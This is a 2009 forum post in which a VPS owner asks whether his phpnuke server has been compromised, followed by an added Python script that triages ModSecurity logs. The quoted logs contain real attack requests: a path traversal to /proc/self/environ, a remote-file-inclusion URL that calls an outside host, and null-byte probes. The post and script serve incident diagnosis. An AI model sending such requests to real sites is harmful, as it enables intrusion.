The Community Forums


Have I been hacked?

Discussion in 'General Discussion' started by mattb37, May 18, 2009.

  1. mattb37 (Registered; joined May 18, 2009; 3 messages)

    Services fail after UTF8 Abuse attack

    Hi, I have been a little worried about the security on my cPanel VPS. At my previous host, my account was hacked and a phishing scam was launched from it. Now that I am fully independent, I don’t want the same thing happening again. Sorry for the lengthy post in advance, but this is probably the best way I can get my situation across.

    The website in question runs phpnuke platinum, which I know is very vulnerable to attacks. I have been trying to prevent the daily XSS attacks I get by disabling "allow_url_fopen" in php, but I have still received notifications that remote exploits were being run.

    Here is what I have had reported from lfd today.

    18:15 - LFD blocks an IP address for running UTF8 Encoding Abuse Attacks. IP address logged (85.214.145.133) as originating from Germany; later attacks I have had logged came from the same IP address range, prompting me to terminate all unnecessary services.

    Code:
    [Mon May 18 18:10:00 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:uid. [offset "39"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGWaE6B-DQAAHb6fwsAAAAI"]
    
    [Mon May 18 18:10:03 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:year. [offset "41"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGWa06B-DQAAA4kF2kAAAAA"]
    
    [Mon May 18 18:14:32 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS_NAMES:nuke\\xa7bb\\xa7root\\xa7path. [offset "4"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "yournovavets.com"] [uri "/modules/Forums/favorites.php"] [unique_id "ShGXeE6B-DQAAHb7f94AAAAL"]
    
    [Mon May 18 18:14:45 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:sid. [offset "36"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGXhU6B-DQAAA4kF2sAAAAA"]
    
    [Mon May 18 18:14:51 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:uid. [offset "37"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGXi06B-DQAAC0VTA0AAAAJ"]
    
    19:18 - spamd, sshd & named fail.
    19:30 - PHP nuke fusion reports SQL exploit, IP address 85.214.73.46 banned by nuke.

    Code:
    Cause: Breach attempt on file admin.php or attempted to use SQL exploit Url String: /arcade.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

    20:19 - ftpd, mysql failed
    20:26 - XSS attack on php nuke cms

    Code:
    The user Anonymous was on the page admin.php on your site NovaVets Ip is: 85.214.73.46 User Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4
    Date: 2009.05.18 21:26:19
    Used Url: /admin.php?include_path=http:/www.fmf2004.hu/buggsbunny??
    
    20:38 - System integrity check failed on LFD and CSF (md5)

    Code:
    The following list of files have FAILED the md5sum comparison test. This means that the file has been changed in some way. This could be a result of an OS update or application upgrade. If the change is unexpected it should be investigated:
    
    /usr/sbin/csf: FAILED
    /etc/init.d/csf: FAILED
    /etc/init.d/lfd: FAILED
    
    20:19 - ftpd failed

    20:43 - I logged in via ssh, terminated unrequired services (httpd, ftp, pop, exim, named, imap & cpservd), backed up home directory to an external server, rebooted system. Upon system rebooting CSF would not start and I had to rebuild the csf conf.

    22:19 - enabled all services terminated at 20:43, rebooted system and it seems to be running fine.

    My mod security log has been showing 127.0.0.1 as requesting pages with the following get statements:
    • /%00/ HTTP/1.0
    • /index.jsp%00x HTTP/1.0
    • /ext.ini.%00.txt HTTP/1.0
    • /web-console/ServerInfo.jsp%00 HTTP/1.0

    Could the above list be an exploit being run on the system?

    Regarding the XSS attacks and my failing to disable "allow_url_fopen", how would I best proceed with disabling this function? I have tried and failed to find a solution over the past week or so.

    What can I do about the UTF8 abuse? Is there something I can run to check the security on my VPS, and what damage, if any, could have been done? I am running CSF but am very restricted as to the number of rules I can apply; I keep hitting the 191/200 numiptent error. I might move all my web services to a dedicated server, which I know would fix this and allow me to run a much larger set of rules.

    With everything above, is it likely that my system has been compromised and I should be thinking about rebuilding various parts of it, particularly the services which failed the md5 check? I have changed passwords, but I get the feeling that might not be enough with processes being run locally.

    Thanks for reading this far and any replies would be much appreciated.

    Matt.
     
    #1 mattb37, May 18, 2009
    Last edited: May 18, 2009
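Triage for the mod_security entries quoted in the post, as an added example written here and not code from the post, cPanel or CSF: it parses lines in that error_log format into fields (client, rule id, msg, uri and the ARGS location the rule fired on) and reports clients that trigger rule 950801 repeatedly inside a short window, which is the kind of evidence to collect before deciding whether the VPS itself, rather than just the CMS, is at risk. The sample lines are constructed in the same format; the client IPs, hostname and unique_id values are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample entries in the format of the mod_security lines quoted in the post (client IPs, hostname and unique_id values made up).
SAMPLE_LOG = """\
[Mon May 18 18:10:00 2009] [error] [client 203.0.113.10] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:uid. [offset "39"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.example.com"] [uri "/modules.php"] [unique_id "id0001"]
[Mon May 18 18:10:03 2009] [error] [client 203.0.113.10] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:year. [offset "41"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.example.com"] [uri "/modules.php"] [unique_id "id0002"]
[Mon May 18 18:14:32 2009] [error] [client 203.0.113.10] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS_NAMES:nuke\\xa7bb\\xa7root\\xa7path. [offset "4"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.example.com"] [uri "/modules/Forums/favorites.php"] [unique_id "id0003"]
[Mon May 18 19:05:10 2009] [error] [client 198.51.100.7] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:q. [offset "2"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.example.com"] [uri "/search.php"] [unique_id "id0004"]
"""

LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] ModSecurity: '
    r'(?P<text>.*?)(?P<tags>(?: \[\w+ "[^"]*"\])+)$')
TAG_RE = re.compile(r'\[(\w+) "([^"]*)"\]')  # [id "950801"], [uri "/modules.php"], ...
LOC_RE = re.compile(r' at (\S+?)\.?$')        # "... at ARGS:uid." -> ARGS:uid

def parse_line(line):
    """Parse one entry into a dict (ts, client, text, location + every [key "value"] tag)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = {"ts": datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"),
           "client": m["ip"], "text": m["text"]}
    rec.update(TAG_RE.findall(m["tags"]))
    loc = LOC_RE.search(m["text"])
    rec["location"] = loc.group(1) if loc else None
    return rec

def parse_log(text):
    return [r for r in map(parse_line, text.splitlines()) if r]

def repeat_offenders(records, rule_id="950801", threshold=3, window=timedelta(minutes=10)):
    """Clients with >= threshold hits of rule_id inside any window; returns {client: peak count}."""
    by_client = defaultdict(list)
    for r in records:
        if r.get("id") == rule_id:
            by_client[r["client"]].append(r["ts"])
    flagged = {}
    for ip, times in by_client.items():
        times.sort()
        peak = start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # drop hits that fell out of the window
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged
```

Run it over the real /usr/local/apache/logs/error_log instead of SAMPLE_LOG to see which clients and which parameters (ARGS:uid, ARGS:sid, ...) the rule keeps firing on; a single client hammering one CMS script points at automated probing of the application, not at the host being driven from 127.0.0.1.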